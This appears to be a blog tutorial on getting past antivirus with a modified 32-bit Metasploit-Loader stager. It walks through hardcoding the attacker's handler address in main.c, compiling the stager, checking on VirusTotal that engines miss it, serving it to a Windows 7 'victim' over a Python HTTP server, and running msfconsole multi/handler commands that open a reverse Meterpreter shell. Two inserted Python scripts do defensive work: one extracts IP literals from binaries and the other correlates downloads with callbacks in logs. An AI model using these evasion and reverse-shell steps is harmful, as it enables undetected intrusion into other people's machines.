Bypassing AV through Metasploit Loader 32-Bit

goswamiijaya, published in SecureBit
Aug 25, 2020 (4 min read)

Bypassing antivirus detection on VirusTotal by generating a payload with Metasploit Loader 32-bit.

Metasploit-Loader is a small stager client written in C (easy to read), compatible with the Metasploit Framework and created by Raphael Mudge (rsmudge).

Metasploit-Loader connects to the Metasploit handler, fetches the Meterpreter DLL, loads it in memory and passes control back to us.

STEPS:

1. Download & Save Metasploit-Loader:

[Figure: GitHub page of Metasploit-Loader]

Use Link: Metasploit-Loader
Use Commands: git clone https://github.com/rsmudge/metasploit-loader.git

[Figure: cloning Metasploit-Loader]

Install Metasploit-Loader:

Open the src folder of the cloned repository (metasploit-loader/src).

2. Edit the Main.c file:

Edit the int main() function in metasploit-loader/master/src/main.c as shown in the figure below:

[Figure: main.c file]

In main.c, the original code reads:

    if (argc != 3) {
        printf("%s [host] [port]\n", argv[0]);
        exit(1);
    }

    /* connect to the handler */
    SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));

Replace the above lines with the following (the argc check is dropped because the host and port are no longer read from the command line):

    /* connect to the handler */
    SOCKET my_socket = wsconnect("192.168.137.128", 9500);

Save the file main.c.
Here, the attacker's IP and port are 192.168.137.128 and 9500.
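From a defender's side, hardcoding the handler address in the source has a cost: the IP address survives compilation as a plain string inside the binary (the port, a numeric literal, is compiled into an instruction immediate and does not), so a triage analyst can recover the handler endpoint without running the sample. The following Python script is an added example for this article, not code from Metasploit-Loader or its author. It scans a byte blob for ASCII and UTF-16LE IPv4 literals, validates the octets, separates private from public ranges and flags version-string look-alikes. SAMPLE_BLOB, the _wide_strings helper and the "version-string?" heuristic are constructed for illustration.

```python
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# One regex for both passes: a dotted quad not glued to further digits or dots.
IPV4_RE = re.compile(r"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3})(?![\d.])")

# Constructed sample (NOT bytes taken from metasploit-loader): a slice of what a
# stager's read-only data might hold. It contains the handler address from the
# article as an ASCII string and again as UTF-16LE, a version-like decoy, an
# out-of-range quad and a public address.
SAMPLE_BLOB = (
    b"\x00\x00WS2_32.dll\x00connect\x00"                   # offsets 0..20
    + b"192.168.137.128\x00\x00\x00\x00"                    # ASCII literal at offset 21
    + "192.168.137.128".encode("utf-16-le") + b"\x00\x00"   # wide literal at offset 40
    + b"FileVersion 1.2.3.4\x00"                            # decoy: looks like an address
    + b"999.1.1.1\x00"                                      # invalid octet, must be rejected
    + b"8.8.8.8\x00"
)


def _wide_strings(blob: bytes, min_len: int = 7) -> List[Tuple[int, str]]:
    """(byte offset, text) for runs of printable UTF-16LE characters, like `strings -el`."""
    runs: List[Tuple[int, str]] = []
    i, n = 0, len(blob)
    while i + 1 < n:
        start, chars = i, []
        while i + 1 < n and 0x20 <= blob[i] < 0x7F and blob[i + 1] == 0:
            chars.append(chr(blob[i]))
            i += 2
        if len(chars) >= min_len:
            runs.append((start, "".join(chars)))
        if i == start:
            i += 1
    return runs


def _classify(ip_text: str, context: str) -> Optional[Tuple[str, str]]:
    """None for invalid quads; otherwise (scope, note)."""
    try:
        ip = ipaddress.IPv4Address(ip_text)  # rejects octets above 255
    except ipaddress.AddressValueError:
        return None
    scope = "private/reserved" if ip.is_private else "public"
    # Heuristic: a quad next to the word "version" is usually a file version, not an address.
    note = "version-string?" if "version" in context.lower() else ""
    return scope, note


def extract_ipv4_literals(blob: bytes) -> List[Dict]:
    """Return every valid IPv4 literal in blob with offset, encoding, scope and note."""
    hits: List[Dict] = []
    # ASCII pass: latin-1 maps each byte to one character, so text offsets equal byte offsets.
    text = blob.decode("latin-1")
    for m in IPV4_RE.finditer(text):
        cls = _classify(m.group(1), text[max(0, m.start() - 16):m.start()])
        if cls:
            hits.append({"offset": m.start(), "encoding": "ascii", "ip": m.group(1),
                         "scope": cls[0], "note": cls[1]})
    # UTF-16LE pass over decoded wide runs; every character is two bytes wide.
    for base, s in _wide_strings(blob):
        for m in IPV4_RE.finditer(s):
            cls = _classify(m.group(1), s[max(0, m.start() - 16):m.start()])
            if cls:
                hits.append({"offset": base + 2 * m.start(), "encoding": "utf-16le",
                             "ip": m.group(1), "scope": cls[0], "note": cls[1]})
    hits.sort(key=lambda h: h["offset"])
    return hits


def c2_candidates(hits: List[Dict]) -> List[str]:
    """Unique addresses worth pivoting on in logs: drop version-string look-alikes."""
    return sorted({h["ip"] for h in hits if not h["note"]})


if __name__ == "__main__":
    found = extract_ipv4_literals(SAMPLE_BLOB)
    for h in found:
        print(f"0x{h['offset']:06x} {h['encoding']:8} {h['ip']:15} {h['scope']:16} {h['note']}")
    print("pivot candidates:", c2_candidates(found))
```

To use it on a real file, pass open(path, "rb").read() to extract_ipv4_literals. The private/reserved label is what you would expect for a lab handler like the one above; a public address in a fresh, unsigned executable is the stronger signal and the one to search for in proxy and firewall logs.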

3. Generate the exe file by compiling main.c with the MinGW compiler:

[Figure: MinGW compiler]

Use Commands: i686-w64-mingw32-gcc main.c -o loadmeta.exe -lws2_32

This compiles main.c and produces the executable loadmeta.exe, which is transferred to the victim's machine (Windows 7) in step 5.

4. Test the executable against antivirus:

You can check the payload against antivirus engines and see that the file goes undetected.
If you scan the executable on VirusTotal, it goes undetected by many of the engines, such as AVG, Avast, Palo Alto, Tencent, Malwarebytes, Alibaba, Cat-QuickHeal, etc.

[Figure: VirusTotal scan, payload goes undetected]

5. Transfer the payload to the victim's machine:

Transfer the exe file to the victim's machine (Windows 7).

[Figure: transferring the payload to the victim]

Here, we are using a simple Python HTTP server to transfer the executable to the victim's machine. Once run there, the executable acts as a reverse payload and connects back to the attacker's machine (Kali).

Use Commands: python -m SimpleHTTPServer

[Figure: Python HTTP server]

6. Start the multi handler:

Start a multi handler on the attacker's machine to receive the reverse_tcp Meterpreter connection coming from the victim.

[Figure: reverse TCP handler]

Use Commands:
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.137.128
> set LPORT 9500
> exploit

7. Download & Run the Payload:

From the victim's machine, connect to the HTTP server, then download and run the executable.

[Figure: payload is downloaded]

Also, the Windows 7 antivirus shows no warning for the payload, loadmeta.exe.

Run the executable file:

[Figure: the payload is executed]
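Steps 5 to 7 also describe the network footprint this lab leaves behind: a workstation downloads an .exe from a Python SimpleHTTPServer (which identifies itself with a Server header beginning "SimpleHTTP/" and listens on port 8000 by default) and shortly afterwards opens an outbound TCP connection to the same host on a port that is neither the HTTP port nor a common service port (9500 here). The following Python script is an added example, not part of the article, that correlates these two events across constructed proxy and firewall log lines. The log format, the hosts, the five-minute window and the list of common ports are assumptions of the example.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample logs (not from the article's lab). Host .130 fetches
# loadmeta.exe from a Python SimpleHTTPServer on .128:8000 and, 38 seconds
# later, opens an outbound TCP connection to .128 on 9500, the hardcoded
# handler port from the article. Host .131 is benign noise.
PROXY_LOG = """\
2020-08-25T10:00:03Z src=192.168.137.130 dst=192.168.137.128:8000 method=GET url=/loadmeta.exe status=200 server="SimpleHTTP/0.6 Python/2.7.18"
2020-08-25T10:00:05Z src=192.168.137.131 dst=93.184.216.34:443 method=GET url=/index.html status=200 server="nginx"
"""
FIREWALL_LOG = """\
2020-08-25T10:00:06Z action=allow proto=tcp src=192.168.137.131 dst=93.184.216.34 dport=443
2020-08-25T10:00:41Z action=allow proto=tcp src=192.168.137.130 dst=192.168.137.128 dport=9500
2020-08-25T10:00:42Z action=allow proto=tcp src=192.168.137.130 dst=192.168.137.128 dport=8000
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')   # key=value or key="quoted value"
EXEC_EXT = (".exe", ".dll", ".scr")          # assumed list of executable extensions
WINDOW = timedelta(minutes=5)                # assumed correlation window
COMMON_PORTS = {80, 443}                     # assumed "expected" destination ports


def parse_line(line: str) -> Dict[str, str]:
    """Split 'ts k=v k="v v" ...' into a dict; the leading timestamp goes under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = {"ts": ts}
    for key, value in KV_RE.findall(rest):
        fields[key] = value.strip('"')
    return fields


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def correlate(proxy_log: str, firewall_log: str) -> List[Dict]:
    """Alert when a host that just downloaded an executable from a server opens a
    new, non-HTTP TCP connection back to that same server within WINDOW."""
    downloads = []
    for line in proxy_log.splitlines():
        f = parse_line(line)
        if not f.get("url", "").lower().endswith(EXEC_EXT):
            continue
        server, _, port = f["dst"].rpartition(":")
        downloads.append({
            "ts": _ts(f["ts"]), "src": f["src"], "server": server,
            "http_port": int(port), "url": f["url"],
            # Secondary signal: Python's SimpleHTTPServer announces itself this way.
            "python_simplehttp": f.get("server", "").startswith("SimpleHTTP/"),
        })

    alerts = []
    for line in firewall_log.splitlines():
        f = parse_line(line)
        if f.get("proto") != "tcp":
            continue
        when, dport = _ts(f["ts"]), int(f["dport"])
        for d in downloads:
            same_pair = f["src"] == d["src"] and f["dst"] == d["server"]
            in_window = timedelta(0) <= when - d["ts"] <= WINDOW
            new_port = dport not in COMMON_PORTS and dport != d["http_port"]
            if same_pair and in_window and new_port:
                alerts.append({
                    "host": f["src"], "server": f["dst"], "dport": dport,
                    "download": d["url"],
                    "seconds_after": int((when - d["ts"]).total_seconds()),
                    "python_simplehttp": d["python_simplehttp"],
                })
    return alerts


if __name__ == "__main__":
    for a in correlate(PROXY_LOG, FIREWALL_LOG):
        print(f"ALERT {a['host']} downloaded {a['download']} from {a['server']} and "
              f"connected back to tcp/{a['dport']} {a['seconds_after']}s later "
              f"(python SimpleHTTP server: {a['python_simplehttp']})")
```

The two-event correlation is deliberately independent of the binary's hash, which is why it still fires after the sample is recompiled with a different address; tune COMMON_PORTS and WINDOW to the environment, and treat the SimpleHTTP Server header only as supporting evidence, since any file server could be used instead.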

8. Reverse shell at the attacker's machine:

Now check the handler: a reverse Meterpreter session has been opened by Metasploit-Loader from the victim's machine.

[Figure: Meterpreter session]

Use Commands: getuid // to confirm which user the session is running as on the victim.

In the next session: Bypassing AV through Metasploit Loader 64-Bit

References:
1. Metasploit-Loader
2. MinGW Compiler
3. VirusTotal

Thanks!👾
